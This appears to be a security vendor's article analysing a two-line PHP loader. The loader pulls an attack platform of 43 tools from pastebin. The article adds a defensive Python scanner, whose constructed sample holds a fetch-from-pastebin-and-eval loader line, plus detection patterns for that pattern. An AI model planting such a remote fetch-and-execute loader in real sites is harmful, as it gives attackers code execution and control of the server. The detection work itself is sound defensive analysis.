During a recent investigation of a very large infection we found a trove of attack tools that all pointed back to a single “meta” script. This script was only two lines long but provided an attacker with a powerful capability. Once it fully installs itself, it provides what we are referring to as an “attack platform”.
We reverse engineered the script and found that it was downloading its full source code from pastebin.com, a site where anyone can post any text anonymously. The attacker had posted the source on pastebin, and the script would download itself from there and execute it. The effect of this is that the initial infection is only two lines long.
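The defensive corollary of that two-line design is that the first stage leaves a recognisable footprint on disk: a paste-site URL sitting next to a remote fetch and a code-execution call in a tiny file. The scanner below is an added example written for this article, not Wordfence's own tooling; it assumes the loader is PHP (the article does not say) and uses constructed sample files with a placeholder paste ID rather than any real indicator.

```python
import re
import tempfile
from pathlib import Path

# Constructed sample web root (not real malware): a benign page, a tiny loader
# that fetches its body from pastebin.com and executes it (the pattern described
# above), and a file that merely mentions pastebin in a comment.
SAMPLE_FILES = {
    "index.php": "<?php\necho 'welcome';\n",
    "wp-content/uploads/cache.php":
        "<?php\n$s=file_get_contents('https://pastebin.com/raw/PASTE_ID_PLACEHOLDER');\neval($s);\n",
    "wp-content/themes/x/functions.php":
        "<?php\n// see https://pastebin.com/raw/PASTE_ID_PLACEHOLDER for notes\n",
}

PASTE_HOST = re.compile(r"https?://(?:www\.)?pastebin\.com/", re.I)
REMOTE_FETCH = re.compile(r"\b(?:file_get_contents|curl_exec|fopen|fsockopen)\s*\(", re.I)
CODE_EXEC = re.compile(r"\b(?:eval|assert|create_function)\s*\(", re.I)

def classify(src: str) -> dict:
    """Return which stage-1 loader indicators a file's source text exhibits."""
    return {
        "paste_url": bool(PASTE_HOST.search(src)),
        "remote_fetch": bool(REMOTE_FETCH.search(src)),
        "code_exec": bool(CODE_EXEC.search(src)),
    }

def is_stage1_loader(src: str) -> bool:
    """Flag only when a paste-site URL co-occurs with fetch and execute; a bare URL is not enough."""
    f = classify(src)
    return f["paste_url"] and f["remote_fetch"] and f["code_exec"]

def scan_webroot(root: Path) -> list[str]:
    """Walk a web root and return relative paths of files that look like stage-1 loaders."""
    hits = []
    for p in sorted(root.rglob("*.php")):
        try:
            src = p.read_text(errors="replace")
        except OSError:
            continue  # unreadable file: skip rather than abort the whole scan
        if is_stage1_loader(src):
            hits.append(p.relative_to(root).as_posix())
    return hits

def demo() -> list[str]:
    """Materialise the constructed sample web root in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        for rel, body in SAMPLE_FILES.items():
            (root / rel).parent.mkdir(parents=True, exist_ok=True)
            (root / rel).write_text(body)
        return scan_webroot(root)

if __name__ == "__main__":
    print(demo())  # → ['wp-content/uploads/cache.php']
```

Point `scan_webroot` at a real document root to triage; the comment-only file shows why the three indicators are required together rather than alerting on the hostname alone.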
The attack platform, once fully installed, provides an attacker with 43 attack tools they can then download, also from pastebin, with a single click. The functionality these tools provide includes:
Complete attack shells that let attackers manage the filesystem, access the database through a well designed SQL client, view system information, mass infect the system, DoS other systems, find and infect all CMSs, view and manage user accounts both on CMSs and the local operating system, and much more.
An FTP brute force attack tool
A Facebook brute force attacker
A WordPress brute force attack script
Tools to scan for config files or sensitive information
Tools to download the entire site or parts thereof
The ability to scan for other attackers’ shells
Tools targeting specific CMSs that let you change their configuration to host your own malicious code
In the case of this infection, the source appears to be a hacking group in Vietnam and one individual within that group.
To provide you with some insight into the powerful capability that this platform provides, we have created a video demonstration in which we infect a test virtual machine with the two-line meta script and use it to download the tools it provides.
It’s important to note that we did this demonstration inside a clean new virtual machine and included a few tools of our own to prevent further infection and data exfiltration. These include forcing all network traffic from this machine through a proxy so that we can see what is arriving at and leaving this infected test machine.
This article was previously posted at wordfence.com